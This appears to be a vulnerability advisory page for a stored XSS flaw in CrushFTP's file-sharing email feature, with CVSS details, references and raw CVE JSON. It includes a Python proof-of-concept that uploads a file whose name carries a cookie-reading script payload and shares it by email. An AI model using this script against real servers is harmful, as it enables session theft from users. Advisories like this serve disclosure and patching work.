Security Vulnerability Report
CVE-2025-63419 CVSS 6.1 MEDIUM

CVE-2025-63419

Published: 2025-11-12 17:15:39
Last Modified: 2025-12-31 16:34:13

Description

Cross-Site Scripting (XSS) vulnerability in CrushFTP 11.3.6_48. The web-based server has a file-sharing feature that reflects the filename into an email body field without sanitization, leading to HTML injection.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:crushftp:crushftp:*:*:*:*:*:*:*:* - VULNERABLE (versions before 11.3.7_60, per the CPE match criteria)
CrushFTP 11.3.6_48 (version named in the description)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import urllib.parse

# CVE-2025-63419 PoC - Stored XSS in CrushFTP File Sharing
# Target: CrushFTP 11.3.6_48
target_url = "http://target-server:8080/"

# Malicious filename containing XSS payload
malicious_filename = '<script>alert(document.cookie)</script>'

# Step 1: Authenticate to CrushFTP
login_data = {
    "username": "attacker",
    "password": "password123"
}
session = requests.Session()
login_resp = session.post(f"{target_url}api/login", data=login_data)

# Step 2: Upload file with malicious filename
files = {
    "file": (malicious_filename, b"test content", "application/octet-stream")
}
upload_resp = session.post(f"{target_url}api/upload", files=files)

# Step 3: Share the file via email (triggers XSS in email body)
share_data = {
    "filename": malicious_filename,
    "recipient_email": "[email protected]",
    "message": "Please check this file"
}
share_resp = session.post(f"{target_url}api/share", data=share_data)

print(f"XSS payload sent: {urllib.parse.quote(malicious_filename)}")
print(f"Response: {share_resp.status_code}")
# When victim views the email notification, XSS executes
```

References

https://gist.github.com/MMAKINGDOM/39ded58b1e6d2d19366e76e0d5b1c851 (Exploit, Third Party Advisory)
https://github.com/MMAKINGDOM/CVE-2025-63419/ (Exploit, Third Party Advisory)
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-63419",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-12T17:15:38.710",
    "lastModified": "2025-12-31T16:34:12.763",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Cross Site Scripting (XSS) vulnerability in CrushFTP 11.3.6_48. The Web-Based Server has a feature where users can share files, the feature reflects the filename to an emailbody field with no sanitations leading to HTML Injection."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "baseScore": 6.1,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-79"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:crushftp:crushftp:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "11.3.7_60",
                "matchCriteriaId": "01E11F0D-2898-4CE5-AFE5-1281DF834BBA"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://gist.github.com/MMAKINGDOM/39ded58b1e6d2d19366e76e0d5b1c851",
        "source": "[email protected]",
        "tags": ["Exploit", "Third Party Advisory"]
      },
      {
        "url": "https://github.com/MMAKINGDOM/CVE-2025-63419/",
        "source": "[email protected]",
        "tags": ["Exploit", "Third Party Advisory"]
      }
    ]
  }
}
```